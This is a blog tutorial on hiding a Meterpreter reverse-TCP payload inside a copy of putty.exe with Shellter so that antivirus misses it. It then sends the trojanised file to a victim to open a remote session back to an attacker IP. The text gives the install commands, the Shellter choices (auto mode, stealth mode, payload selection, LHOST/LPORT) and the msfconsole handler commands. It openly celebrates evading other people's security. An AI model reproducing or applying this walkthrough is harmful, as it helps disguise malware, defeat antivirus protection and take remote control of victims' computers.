Hey Folks! Welcome back to learning more of what you love to
do. That is, evading security of other computer or network. You know that there
are various tools to assist you in this. One of such tools is Shellter.
Shellter is an active shellcode insertion tool. It
effectively re-encodes payloads (here shellcode) to bypass anti-virus (AV) software.
Shellter has proved to be the first dynamic infector for PE (Portable
Executable) file format of Windows 32-bit applications.
To use Shellter, you can either create your own shellcode or
create one from a framework such as Metasploit. Shellter embeds a 32-bit
Windows application and the shellcode in such as way that it goes undetected by
the AV software.
Let’s now discuss the steps to evade an AV software using
Shellter in Kali Linux.
Download
and Install Shellter
Download Shellter from here. You can download
Shellter in Windows and then run it on Kali Linux using Wine. It runs Windows
applications on Linux like operating systems. In this way, you can reduce the
time required for installation.
You can install Shellter directly on Kali by using the
following command:
apt –get install
shellter
You can install Wine on Kali with the following command:
apt –get install
wine32
Open
Shellter
When you open Shellter in Kali in wine mode, it prompts you
to choose operation mode.
Choose
Operation Mode
Select the mode as ‘a’.
It stands for auto.
Now, you need to choose an executable file and copy it to
the Shellter folder. This is required to be done to bind Shellter with an .exe file. In our case, we have copied putty.exe file to the Shellter folder
and bound it with shellter.exe file.
When asked for PE Target, type the following command:
/root/Downloads/putty.exe
The binding process starts.
Press the Enter
key to continue. You may see DisASM.dll
file gets successfully created. Enable
Stealth Mode. Then, you are prompted to enable stealth mode.
Type ‘y’ for yes.
Select
Payload
The screen shows a list of payloads. It
asks you whether you want to use a listed payload or custom.
Type
‘L’ to use from listed payload.
Then, it asks you to select payload by
index. You can select payload of your choice. In our case, we have selected 1 for Meterpreter_Reverse_TCP
Then you are asked to set LHOST and LPORT.
Type the local host IP and the local port on which you want the session. In our
case, we have set LHOST 192.168.1.109
[Attacker IP] LPORT as 4444.
When you press the Enter key, the payload
information is displayed.
A warning message appears and as soon as the
injection is verified, you are asked to press the Enter key to continue. When
you press the Enter key.
Run Exploit
In a new terminal type msfconsole to launch metasploit framework and execute following
command
use
exploit/multi/handler
set
payload windows/meterpreter/reverse_tcp
set
lhost
set
lport
exploit
Send
PuTTY.exe File to Victim’s Machine
When the victim’s click the putty.exe file which will be
appear as similar as original putty.exe and hence the victim’s will get trapped
and we will get meterpreter session.
As soon as the victim’s will click on
putty.exe file, we will get meterpreter session as shown in the below image.
The meterpreter session opens and there you
are ready to peek into the target system.
0 comments:
Post a Comment